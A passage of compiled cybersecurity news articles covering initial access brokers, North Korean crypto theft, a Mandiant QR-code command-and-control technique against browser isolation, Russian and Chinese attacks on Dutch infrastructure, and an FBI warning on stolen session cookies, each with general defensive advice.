This system benefits both inexperienced attackers and advanced hacking groups. For less skilled criminals, IABs provide access to high-value targets they could never reach independently. For seasoned ransomware operators, purchasing pre-stolen access saves time and allows them to focus on deploying malware or stealing sensitive data.

Such credentials as usernames and passwords are a hacker's key to entering a system directly, bypassing all the security barriers. Such an attack occurred during major breaches such as in the 

  • Geico Case: Cyber thieves in 2024 accessed Geico's online tools with stolen credentials and compromised sensitive information for 116,000 customers and paid the company millions in fines.
  • ADT Breach: Thieves had used the credentials of one of ADT's partners to breach ADT's internal systems twice, releasing customer records and proving that even trusted relationships can be compromised. In a report released by IBM in 2024, compromised credentials accounted for nearly 20% of all data breaches and were frequently unobserved for months, leaving attackers sufficient time to steal their information.


How to Protect Against IABs  

Organizations must adopt proactive measures to counteract these threats:  

1. Threat Intelligence: Tools can monitor underground markets for stolen credentials. If a company’s data appears on these platforms, immediate action—like forcing password changes can help minimize damage.

2. Complex Passwords: It is recommendable that companies enforce rules forcing employees to use complex, unique passwords and to update them regularly. Platforms like Specops Password Policy allow companies to check their credentials against known breached databases to prevent using the same breached passwords.

Although IABs have made cybercrime more efficient, organizations can protect themselves by understanding their tactics and strengthening their defenses. Regular monitoring, strong password practices, and quick responses to breaches are key to staying ahead of these threats. By closing the gaps hackers exploit, companies can make it harder for cybercriminals to succeed.




North Korean Hackers Set New Record with $1.8 Billion Crypto Heist

 


Hackers associated with North Korea have taken cyber theft to a record-breaking level in 2024, stealing $1.8 billion in cryptocurrency. According to a detailed report by blockchain analytics firm Chainalysis, this highlights the growing sophistication of these attackers and the risks they pose to international security, particularly in the United States. Here's a simpler, step-by-step explanation of the issue.

In 2024, more than half of the $3 billion taken from cryptocurrency platforms globally was attributed to North Korean hackers. The figures increased sharply from last year. In 2023, there were 20 incidents that collectively totaled $660.5 million. This year, it skyrocketed to $1.8 billion through 47 incidents.

These hackers are using increasingly advanced strategies to target and steal digital currencies, showcasing their ability to exploit vulnerabilities in cryptocurrency platforms.  


How Do Hackers Launder Stolen Cryptocurrency?  

After stealing funds, the hackers use complex methods to hide the origins of the money. Some common techniques include:

1. Financial Platforms: They give the user options to make anonymous transactions, making traceability difficult

2. Crypto Mixing Services: they mix a stolen amount of money with actual money, hiding the source from which it comes 

3. Mining Services: Hackers prefer mining because this is the procedure of changing their stolen funds to untraceable forms.

With these, authorities face challenges tracking and recovering such stolen funds.


Advanced Tools and Phony Jobs

Hackers use deception and advanced tactics in targeting their victims. For example:

  • Remote Work Exploitation: They pose as IT workers and enter companies by working remotely. Recently, 14 North Korean nationals were charged by US authorities for working as fake IT staff in American companies. They allegedly stole over $88 million by manipulating their roles.  
  • Fake Job Websites: These websites appear legitimate and attract people into sharing sensitive information.

To complete this, they use specialized tools to target the cryptocurrency platforms; therefore, hackers make their operations even more efficient.


Why Does North Korea Do This?

North Korea has been under heavy sanctions from the international community, eliminating many sources of revenue. Cyber theft has become a critical way for the country to generate funds. Although stolen funds declined in 2023 to $1 billion from $1.7 billion in 2022, the sharp increase in 2024 shows that they are not letting up on cybercrime.

This is not just a matter of money; it affects global security. The stolen funds are believed to help North Korea sustain its regime and avoid financial penalties imposed by the global community. US officials and cybersecurity experts warn that these activities are a growing threat to financial systems worldwide.

To remedy this, cryptocurrency sites should enhance their security level. People must also remain vigilant against these types of scams, including false employment advertisements. International cooperation will be needed to address these cybercrimes and safeguard digital financial systems.

In summary, the scale and sophistication of North Korean hackers are on the rise, which calls for stronger defenses and global efforts to curb cyber theft. This story is a wake-up call for governments, businesses, and individuals alike.



Here’s How Hackers Are Using QR Codes to Break Browser Security

 



Browser isolation is a widely used cybersecurity tool designed to protect users from online threats. However, a recent report by Mandiant reveals that attackers have discovered a novel method to bypass this measure by utilizing QR codes for command-and-control (C2) operations.

How Browser Isolation Works

Browser isolation is a security technique that separates a user's browsing activity from their local device. It streams only visual content from web pages into the user's browser, preventing direct interaction with potentially harmful sites or exploits. This can be implemented through cloud-based, on-premises, or local solutions.

Traditionally, attackers rely on HTTP requests to communicate with a C2 server and issue commands to compromised systems. However, browser isolation disrupts this process by streaming only webpage pixels, effectively blocking HTTP-based attack methods.

The QR Code Workaround

To bypass browser isolation, Mandiant researchers devised a technique that embeds command data within QR codes. The process works as follows:

  1. The attacker’s server generates a web page containing a QR code embedded with command data.
  2. A headless browser on the victim’s compromised system renders the page and takes a screenshot of the QR code.
  3. The system decodes the QR code to extract and execute the command.

This approach exploits browser isolation’s reliance on transmitting visual data, allowing the QR code to be captured and decoded without triggering traditional security defenses.

Real-World Proof of Concept

Mandiant demonstrated the attack using tools like Puppeteer and Chrome in headless mode. They further integrated the technique with Cobalt Strike’s External C2 feature, showcasing its practicality. However, the technique has certain limitations:

  • Data Size: QR codes have a limited storage capacity, with a practical limit of about 2,189 bytes per code.
  • Latency: Each operation introduces a delay of approximately five seconds, making it unsuitable for high-bandwidth tasks such as proxying.

Mitigation Strategies

Despite this new attack vector, browser isolation remains a valid and essential security measure. Mandiant recommends a layered defense strategy to mitigate such threats:

  1. Monitor Network Traffic: Detect abnormal low-bandwidth activity, such as iterative HTTP requests.
  2. Identify Automation Tools: Watch for specific flags associated with headless mode in browser sessions.
  3. Layered Security: Combine browser isolation with other cybersecurity measures to strengthen defenses.

Conclusion

This novel attack demonstrates the evolving nature of cybersecurity threats and the need for constant vigilance. Organizations should adopt a comprehensive approach, including education and robust protection strategies, to defend against emerging threats effectively. Browser isolation remains an important tool when integrated into a layered security framework.

Russia and China Up Their Cyberattacks on Dutch Infrastructure, Security Report Warns

 


Dutch security authorities have recorded growing cyber threats from state-affiliated Russian and Chinese hackers targeting organisations in the country. The attacks, mostly to gain access to the critical infrastructure, are seen as preparations for future sabotage and for gathering sensitive information, according to a recent report by the Dutch National Coordinator for Security and Counterterrorism (NCTV).


Rise of Non-State Hackers in Support of Government Agendas

The report says cyber attacks can no longer be considered the preserve of state actors: in fact, it turns out that non-state hackers in Russia and China increasingly are joining in. Of course, Russia: for some of the past year's cyber espionage and sabotage, hacktivists--independent hacking groups not officially communicating with the government are said to have conducted parts of this past year. At times, Russian state cyber actors work in conjunction with them, sometimes using their cover for their own operations, sometimes directing them to fit state goals.

China's cyber operations often combine state intelligence resources with academic and corporate collaborations. Sometimes, persons are performing dual roles: conducting research or scientific duties coupled with pushing forward China's intelligence goals. Such close cooperation treads the fine line between private and state operations, introducing an element of complexity to China's cyber strategy.


China's Advancing Sabotage Capabilities

For some years now, Chinese cyber campaigns focused on espionage, particularly those targeting the Netherlands and other allies, have been well known. Recent developments over the past year, however, have found China's cyber strategies getting broader in scope and quite sophisticated. The recent "Volt Typhoon" campaign, attributed to China, was an example of shifting toward actual sabotage, where critical U.S. infrastructure is the chief target. Although Europe is not currently under such threats from Volt Typhoon, the Netherlands remains vigilant based on China's rapid advancements in its cyber capabilities, which will potentially be implemented globally at a later stage.


Cyber/Disinformation Combined Threat

In the Netherlands, there is a national coordinator for security and counterterrorism, Pieter-Jaap Aalbersberg, who underscored that cyber threats frequently act as part of an integrated approach, which includes information operations. Coordinated actions are riskier because the cyber attack and digital influence operation come together to compromise security. Aalbersberg indicated that risks need to be balanced collectively, both from direct cyber threats and other consequences.


Recent Breach in Dutch Police Forces Concerns

Earlier this month, the Dutch national police announced a breach into officers' personal contact details with thousands of officers being involved, including names, telephone numbers, and email. The attackers behind this breach are unknown, although it is believed that this incident is "very likely" to be carried out by a state-sponsored group. Still, no country was indicated.

The Dutch government views such heightened cyber hostility as pushing a stronger defensive response from its measures about the cybersecurity fields, particularly since the threats from Russians and Chinese are still multiplying. This scenario now presents strong appeal in asking for added fortifications at international cooperation and greater action in stopping these mounting operations of said aggressive expansions through cyber warfare.


FBI Warns of Cybercriminals Stealing Cookies to Bypass Security

 

Cybercriminals are now targeting cookies, specifically the “remember-me” type, to gain unauthorized access to email accounts. These small files store login information for ease of access, helping users bypass multi-factor authentication (MFA). However, when a hacker obtains these cookies, they can use them to circumvent security layers and take control of accounts. The FBI has alerted the public, noting that hackers often obtain these cookies through phishing links or malicious websites that embed harmful software on devices. Cookies allow websites to retain login details, avoiding repeated authentication. 

By exploiting them, hackers effectively skip the need for usernames, passwords, or MFA, thus streamlining the process for unauthorized entry. This is particularly concerning as MFA typically acts as a crucial security measure against unwanted access. But when hackers use the “remember-me” cookies, this layer becomes ineffective, making it an appealing route for cybercriminals. A primary concern is that many users unknowingly share these cookies by clicking phishing links or accessing unsecured sites. Cybercriminals then capitalize on these actions, capturing cookies from compromised devices to access email accounts and other sensitive areas. 

This type of attack is less detectable because it bypasses traditional security notifications or alerts for suspicious login attempts, providing hackers with direct, uninterrupted access to accounts. To combat this, the FBI recommends practical steps, including regularly clearing browser cookies, which removes saved login data and can interrupt unauthorized access. Another strong precaution is to avoid questionable links and sites, as they often disguise harmful software. Additionally, users should confirm that the websites they visit are secure, checking for HTTPS in the URL, which signals a more protected connection. 

Monitoring login histories on email and other sensitive accounts is another defensive action. Keeping an eye on recent activity can help users identify unusual login patterns or locations, alerting them to possible breaches. If unexpected entries appear, changing passwords and re-enabling MFA is advisable. Taking these actions collectively strengthens an account’s defenses, reducing the chance of cookie-based intrusions. While “remember-me” cookies bring convenience, their risks in today’s cyber landscape are notable. 

The FBI’s warning underlines the importance of digital hygiene—frequently clearing cookies, avoiding dubious sites, and practicing careful online behavior are essential habits to safeguard personal information.